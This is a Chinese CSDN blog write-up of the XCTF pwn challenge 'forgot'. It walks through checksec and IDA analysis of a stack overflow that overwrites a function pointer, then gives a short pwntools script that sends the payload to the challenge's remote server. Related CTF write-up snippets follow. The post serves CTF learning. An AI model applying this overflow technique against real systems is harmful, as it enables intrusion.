[攻防世界 pwn]——forgot

最新推荐文章于 2022-06-19 19:46:37 发布
最新推荐文章于 2022-06-19 19:46:37 发布
阅读量172 收藏
点赞数
分类专栏: # 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113880004
版权
"这篇博客介绍了参与攻防世界CTF比赛时遇到的一道pwn题,通过checksec查看保护措施,发现存在函数指针执行的情况。作者通过IDA分析,找到了关键函数sub_80486CC,并利用x00'开头的字符串绕过检查,构造payload实现了函数地址的覆盖,成功触发了目标函数执行。博客展示了具体的exploit代码,包括连接远程服务器、发送payload和交互过程。"
摘要由CSDN通过智能技术生成

[攻防世界 pwn]——forgot

  • 题目地址: https://adworld.xctf.org.cn/
  • 题目:
    在这里插入图片描述
    在checksec看下保护
    在这里插入图片描述
    在IDA中,
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述
    竟然有后面函数, 找到sub_80486CC函数地址
    在这里插入图片描述
    发现最后(*(&v3 + --v14))()执行
    我们可以令v14 = 1这样就相当于v3所指向的函数执行
    将v3所指向的函数地址覆盖为我们想要的函数地址就可以了
    第一个栈溢出无法利用, 第二个可以利用

利用’\x00’开头的字符串绕过检查, v2距离v3 = 0x20

exploit

from pwn import *
p=remote("111.200.241.244",39247)
context.log_level = 'debug'
p.recvuntil("> ")
p.sendline('peak')
payload='\x00' + 'a'*(0x20 - 1)+p32(0x080486cc)
p.recvuntil("> ")
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWN篇:攻防世界PWN-100
weixin_44644249的博客
02-04 429
攻防世界进阶PWN-100 做这道题的时候远程环境可能有点问题,链接上收不到字符,在本地跑exp是可以拿到shell的。之前以为写错了,买了wp试也不行,重开环境还是不行,先记录一下,以后能连上了再提交flag。 查看保护 IDA分析 主函数 sub_40068e sub_40063d 思路分析 sub_40063d接收两个参数(IDA解析这里有点问题,可以查看汇编代码分析),a2=200,a1=&v1[64] 当 i 小于200,read输入到v1,这个就是溢出点,当 i >=
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1399
学习pwn开始,慢慢来不要急
override与final
weixin_50731537的博客
10-08 227
override是一个保障措施,保障派生类中的函数与基类中的虚函数的函数签名一致,否则会因为有些地方有区别而导致一些调试难以发现的错误. 例 Base1中形参是int,Base2中形参是float不一致. override相当于增加了一层保护措施,验证是不是函数签名都一致. final就相当于一个终止措施,被final修饰的类不能被继承,被final修饰的函数不能被重写. ...
攻防世界PWN)forgot
苗_的博客
10-12 261
感觉有些wp写的不是特别详细,当时我看的时候有的地方也是看不太懂... 先拖进ida中看一下: 找到溢出点,因为我们分配给了v2 32byte的内存,但是scanf不限制长度,所以这里可以溢出。 第88行就是决定程序走向的语句了。 初步思路就是栈上的变量覆盖,在v2这里溢出,覆盖掉v3,然后让程序走到sub_80486CC: 既然我们要覆盖v3,那么根据(&v3+ --v14)我们需要让v14的值不变,因为v14 = 1则--v14 = 0,这样程序就会顺利的走到v3. 观察
攻防世界pwn题:forgot
m0_62396648的博客
06-05 501
该文件是32位的,canary和PIE保护机制没开。总览:该函数就是:v5初值为1,对v2输入一串字符。然后执行一个会根据输入的字符串而修改v5的循环语句,最后调用相应的函数。同时,发现文件里面已经含有cat flag的函数: 函数snprintf介绍: printf("cat %s", "./flag")是将cat ./flag输出到屏幕上。 snprintf(s, 0x32, "cat %s", "./flag")是最多将后
攻防世界PWN刷题-forgot
m0_53932372的博客
12-30 2271
forgot 这题,可有意思了。 大晚上的,有点迷。看了几个wp,一个比一个离谱(太简单了)。 后来自己试了试,还真是······ 思路:本题出现了指针变量并且进行了调用,所以可以利用栈溢出漏洞将该地址覆盖为后门函数的地址,让程序正常执行就可以拿到flag。 坑:一定要注意啊对v5的判定。 v5初值为1,进过下面的判断等操作后,其值被改变,而v5的值决定了程序调用那个指针所指的位置。 exp一定要注意,输入的v2的第一个字符,决定了v5的值。 当输入a的时候,经过判定,v5会变成2,则调用第2-1=1,也
攻防世界--进阶区--forgot
Rt1Text的博客
06-19 281
32位/只有NX保护输入的地方,是溢出点__isoc99_scanf("%s", v2);fgets(s, 32, stdin);fgets函数对输入的数据有限制,所以不会造成溢出 可以拿到flag的函数地址 main函数的内容还挺多的,1张没截完第二张是一个for循环额...........最后一行的代码不是很好看,查了查,可以看看它的汇编应该是调用v3[--v5]的一个函数[esp+78h]就是v5的位置要是可以控制v5也就可以调用函数了在for循环内v5的值一直在发生改变,所以不能让v5进入循环让v
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
攻防世界pwn-forgot
最新发布
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
攻防世界pwn-guess_num】
a_silly_coder的博客
01-15 1590
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界)(pwn)forgot
PLpa的博客
07-21 2368
这题我也是想了好久啊,实在是没找到什么办法,后来还是把题目给摸透了根据经验一个个试出来的方法!!! 拿到题目下载附件查看保护: 只开了NX,嗯。。。 进入IDA,————惊了,这个是啥子意思??? 一大堆奇奇怪怪的东西,实在是看不懂,我们只能看看几个关键的输入点: 第一个输入name: 没有什么东西,进行看string v2 : 我们看到距离32的地方,有个0x54的函数指针: 找...
攻防世界 pwn forgot
qq_39596232的博客
06-19 416
下面记录一下我在做攻防世界pwn练习题中的forgot题目的过程,这个题目现在还是有些疑惑的 首先我们看一下题目的安全机制: 然后IDA看一下主函数: int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] int (*v3)(); // [esp+30h] [ebp-54h] int (*v4)(); // [esp+34h] [ebp-50h] int (*v5)(); .
攻防世界——pwn_warmup
syk的博客
05-28 1795
checksec:没有开启任何保护 看到了熟悉的gets()函数,通常一看到这个函数就八成有缓冲区溢出漏洞,可以看出程序为v5开辟了40H的存储空间,所以输入长度超过40H即可造成溢出,再看sprint()函数 可以看到这个函数是获取flag的关键点,程序会打印出此函数的位置,即0x40060d,到这里思路就差不多明了了,我们需要控制溢出位置,把返回地址改为此函数的地址,我们当前函数的返回值位...
ADworld pwn wp - forgot
fa1c4的blog
06-25 135
int __cdecl main() { size_t v0; // ebx char v2[32]; // [esp+10h] [ebp-74h] BYREF _DWORD v3[10]; // [esp+30h] [ebp-54h] char s[32]; // [esp+58h] [ebp-2Ch] BYREF int v5; // [esp+78h] [ebp-Ch] size_t i; // [esp+7Ch] [ebp-8h] v5 = 1; v3[0] ...
xctf 攻防世界-forgot writeup
qq_43189757的博客
07-08 1774
根据ida反汇编的结果可以发现有两处溢出点,第一处溢出点没什么作用,只能观察第二处溢出点 可以观察到箭头处是个函数指针,&v3 是v3在栈上的地址,&v3 + --v14 是根据&v3在栈上移动,上面的for循环是用来改变v14的值,根据溢出点函数指针v3到v12 ,变量v14都可以被我们控制,接下来再找找有没有system函数 发现目标函数,接下来我的想法是利用缓冲...
xctf社区题解1
Spwpun的博客
03-30 3193
web-新手模式: view-source: 鼠标右键被网页禁用了吧,F12查看即可: get_post: 提交之后,显示: robots: 访问robots.txt,发现f1ag_1s_h3re.php页面: 访问f1ag_1s_h3re.php页面: backup: 常见的备份文件后缀名有:.git .svn .swp .~ .bak .bash_history,访问提示如下: ...
攻防世界-web writeup(xctf
菜的只能随便写写博客
07-15 2519
0x01 view source flag放在源码之中,但是网页的脚本限制了鼠标作用,无法点击和选中,直接F12或者浏览器快捷键查看网页源码即可得到flag flag:cyberpeace{e07dcafaeeb31df23b4d661dd4da56f9}   0x02 get_post GET和POST是http协议的两种主要请求方式 GET请求直接把参数包含在url中 POST...
pwn学习-攻防世界(一)
qq_45653588的博客
12-20 840
文章目录0x00 forgot0X01 dice_game0x02 Mary_Morton0x03 warmup 0x00 forgot 下载文件,检查文件保护机制,只开启了NX保护的32位文件。 拖入ida反编译一下,好多函数。。 先输入一个参数s,然后给出了函数sub_8048654()的地址,然后输入参数v2的值,进入for循环。判断v0的值和v2的长度,v0大于等于v2退出循环。 接下来是switch语句,参数为v14,初始为1,退出switch后,会执行(*(&v3 + --v14))()
攻防世界)(pwn)welpwn
PLpa的博客
07-18 2714
首先,放在最前面:这题服务器远端的libc版本是libc-2.23.so而不是libc-2.19.so的版本(害得我编译半天出不来) 看到题目,我们下载附件,一看是个tar.gz文件,我们解压一下,发现里面有三个文件: 我就心想,这个攻防世界怎么就这么好心这次,以前要给的时候从来不给,这次这么大方???答案是大错特错,这就是个骗局,这个反而是个障碍,版本根本就是错的(但仔细一想,有可能是出题者故...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值